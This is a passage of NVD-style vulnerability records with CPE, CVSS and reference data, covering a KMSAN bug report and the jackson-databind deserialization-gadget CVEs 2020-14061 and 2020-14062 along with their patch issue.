"versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:solidfire:-:*:*:*:*:*:*:*", "matchCriteriaId": "A6E9EF0C-AFA8-4F7B-9FDC-1E0F7C26E737", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*", "matchCriteriaId": "E94F7F59-1785-493F-91A7-5F5EA5E87E4D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:aff_a700_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "D951E97B-FA55-4F47-86DD-856A71C66379", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:aff_a700:-:*:*:*:*:*:*:*", "matchCriteriaId": "51DCEEBB-A1E0-4BE8-B5DB-5CD0E125C79D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:h410c_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "234DEFE0-5CE5-4B0A-96B8-5D227CB8ED31", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:h410c:-:*:*:*:*:*:*:*", "matchCriteriaId": "CDDF61B7-EC5C-467C-B710-B89F502CD04F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:h300s_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "6770B6C3-732E-4E22-BF1C-2D2FD610061C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:h300s:-:*:*:*:*:*:*:*", "matchCriteriaId": "9F9C8C20-42EB-4AB5-BD97-212DEB070C43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:h500s_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "7FFF7106-ED78-49BA-9EC5-B889E3685D53", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:h500s:-:*:*:*:*:*:*:*", "matchCriteriaId": "E63D8B0F-006E-4801-BF9D-1C001BBFB4F9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:h700s_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "56409CEC-5A1E-4450-AA42-641E459CC2AF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:h700s:-:*:*:*:*:*:*:*", "matchCriteriaId": "B06F4839-D16A-4A61-9BB5-55B13F41E47F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:h300e_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "108A2215-50FB-4074-94CF-C130FA14566D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:h300e:-:*:*:*:*:*:*:*", "matchCriteriaId": "7AFC73CE-ABB9-42D3-9A71-3F5BC5381E0E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:h500e_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "32F0B6C0-F930-480D-962B-3F4EFDCC13C7", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:h500e:-:*:*:*:*:*:*:*", "matchCriteriaId": "803BC414-B250-4E3A-A478-A3881340D6B8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:h700e_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "0FEB3337-BFDE-462A-908B-176F92053CEC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:h700e:-:*:*:*:*:*:*:*", "matchCriteriaId": "736AEAE9-782B-4F71-9893-DED53367E102", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:h410s_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "D0B4AD8A-F172-4558-AEC6-FF424BA2D912", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:h410s:-:*:*:*:*:*:*:*", "matchCriteriaId": "8497A4C9-8474-4A62-8331-3FE862ED4098", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:aff_8300_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "CA79D39A-A5F2-4C44-A805-5113065F8C25", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:aff_8300:-:*:*:*:*:*:*:*", "matchCriteriaId": "4CA55FBD-6EBA-49C8-92BA-2B1BCCB18A3A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:aff_8700_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "70ECC434-DF20-49A6-B4CF-D5CCA480E57D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:aff_8700:-:*:*:*:*:*:*:*", "matchCriteriaId": "232DC609-8023-41F9-8CE3-1B31CE2F2D93", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:aff_a400_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "56FD9B9A-BBE5-4CA5-B9F9-B16E1FE738C8", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:aff_a400:-:*:*:*:*:*:*:*", "matchCriteriaId": "F3E70A56-DBA8-45C7-8C49-1A036501156F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "908" ]
908
https://github.com/google/kmsan/issues/76
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "google", "kmsan" ]
While fuzzing latest KMSAN-build with HEALER(syscall fuzzer, not published yet), uninit-value is found in kmsan_handle_dma. It seems KMSAN found bugs in itself. Caused by this call sequence [syscalls.txt](https://github.com/google/kmsan/files/4496358/syscalls.txt). With this crash [msg.txt](https://github.com/google/kmsan/files/4496360/msg.txt). THE latest KMSAN is used with this config [config.txt](https://github.com/google/kmsan/files/4496362/config.txt).
BUG: KMSAN: uninit-value in kmsan_handle_dma
https://api.github.com/repos/google/kmsan/issues/76/comments
8
2020-04-18T09:13:03Z
2020-09-17T09:24:49Z
https://github.com/google/kmsan/issues/76
602,416,429
76
1,274
CVE-2020-14061
2020-06-14T20:15:10.027
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to oracle.jms.AQjmsQueueConnectionFactory, oracle.jms.AQjmsXATopicConnectionFactory, oracle.jms.AQjmsTopicConnectionFactory, oracle.jms.AQjmsXAQueueConnectionFactory, and oracle.jms.AQjmsXAConnectionFactory (aka weblogic/oracle-aqjms).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2698" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200702-0003/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2698" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200702-0003/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "4B92AF50-0155-471E-B5C4-1CFD95F4B7D0", "versionEndExcluding": "2.9.10.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.9.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:linux:*:*", "matchCriteriaId": "9FBC1BD0-FF12-4691-8751-5F245D991989", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.3", "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:windows:*:*", "matchCriteriaId": "BD075607-09B7-493E-8611-66D041FFDA62", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.3", "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:vmware_vsphere:*:*", "matchCriteriaId": "0CB28AF5-5AF0-4475-A7B6-12E1795FFDCB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "9.5", "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*", "matchCriteriaId": "E94F7F59-1785-493F-91A7-5F5EA5E87E4D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*", "matchCriteriaId": "C650FEDB-E903-4C2D-AD40-282AB5F2E3C2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:autovue_for_agile_product_lifecycle_management:21.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "97994257-C9A4-4491-B362-E8B25B7187AB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:*", "matchCriteriaId": "BBE7BF09-B89C-4590-821E-6C0587E096B5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:*", "matchCriteriaId": "ADAE8A71-0BCD-42D5-B38C-9B2A27CC1E6B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:*", "matchCriteriaId": "E7231D2D-4092-44F3-B60A-D7C9ED78AFDF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:*", "matchCriteriaId": "F7BDFC10-45A0-46D8-AB92-4A5E2C1C76ED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:*", "matchCriteriaId": "18127694-109C-4E7E-AE79-0BA351849291", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:20.1:*:*:*:*:*:*:*", "matchCriteriaId": "33F68878-BC19-4DB8-8A72-BD9FE3D0ACEC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_calendar_server:8.0.0.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "46059231-E7F6-4402-8119-1C7FE4ABEA96", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_contacts_server:8.0.0.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "D01A0BBC-DA0E-4AFE-83BF-4F3BA01653EC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_diameter_signaling_router:*:*:*:*:*:*:*:*", "matchCriteriaId": "526E2FE5-263F-416F-8628-6CD40B865780", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_element_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "B51F78F4-8D7E-48C2-86D1-D53A6EB348A7", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_evolved_communications_application_server:7.1:*:*:*:*:*:*:*", "matchCriteriaId": "987811D5-DA5E-493D-8709-F9231A84E5F9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_instant_messaging_server:10.0.1.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "0DB23B9A-571E-4B77-B432-23F3DC9B67D1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_session_report_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "3E5416A1-EE58-415D-9645-B6A875EBAED2", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:communications_session_route_manager:*:*:*:*:*:*:*:*", "matchCriteriaId": "11B0C37E-D7C7-45F2-A8D8-5A3B1B191430", "versionEndExcluding": null, "versionEndIncluding": "8.2.2", "versionStartExcluding": null, "versionStartIncluding": "8.2.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/FasterXML/jackson-databind/issues/2698
[ "Patch", "Third Party Advisory" ]
github.com
[ "FasterXML", "jackson-databind" ]
Another gadget type(s) reported regarding class(es) of `aqapi.jar` library, included in Weblogic (for Oracle AQ/JMS support). See https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062 for description of the general problem. Mitre id: CVE-2020-14061 Reporter(s): Fangrun Li (Cloud Security Team at Qihoo 360) Fix will be included in: * 2.9.10.5 * Not considered valid CVE for Jackson 2.10.0 and later (see https://medium.com/@cowtowncoder/jackson-2-10-safe-default-typing-2d018f0ce2ba)
Block one more gadget type (weblogic/oracle-aqjms, CVE-2020-14061)
https://api.github.com/repos/FasterXML/jackson-databind/issues/2698/comments
0
2020-04-25T02:27:29Z
2020-07-16T17:22:34Z
https://github.com/FasterXML/jackson-databind/issues/2698
606,669,819
2,698
1,275
CVE-2020-14062
2020-06-14T20:15:10.167
FasterXML jackson-databind 2.x before 2.9.10.5 mishandles the interaction between serialization gadgets and typing, related to com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool (aka xalan2).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2704" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200702-0003/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/FasterXML/jackson-databind/issues/2704" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/07/msg00001.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://medium.com/%40cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200702-0003/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com//security-alerts/cpujul2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpujan2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2020.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fasterxml:jackson-databind:*:*:*:*:*:*:*:*", "matchCriteriaId": "4B92AF50-0155-471E-B5C4-1CFD95F4B7D0", "versionEndExcluding": "2.9.10.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.9.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:linux:*:*", "matchCriteriaId": "9FBC1BD0-FF12-4691-8751-5F245D991989", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.3", "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:windows:*:*", "matchCriteriaId": "BD075607-09B7-493E-8611-66D041FFDA62", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.3", "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:*:*:*:*:*:vmware_vsphere:*:*", "matchCriteriaId": "0CB28AF5-5AF0-4475-A7B6-12E1795FFDCB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "9.5", "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*", "matchCriteriaId": "E94F7F59-1785-493F-91A7-5F5EA5E87E4D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*", "matchCriteriaId": "C650FEDB-E903-4C2D-AD40-282AB5F2E3C2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.1:*:*:*:*:*:*:*", "matchCriteriaId": "BBE7BF09-B89C-4590-821E-6C0587E096B5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.2:*:*:*:*:*:*:*", "matchCriteriaId": "ADAE8A71-0BCD-42D5-B38C-9B2A27CC1E6B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:18.3:*:*:*:*:*:*:*", "matchCriteriaId": "E7231D2D-4092-44F3-B60A-D7C9ED78AFDF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:19.1:*:*:*:*:*:*:*", "matchCriteriaId": "F7BDFC10-45A0-46D8-AB92-4A5E2C1C76ED", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:banking_digital_experience:19.2:*:*:*:*:*:*:*", "matchCriteriaId": 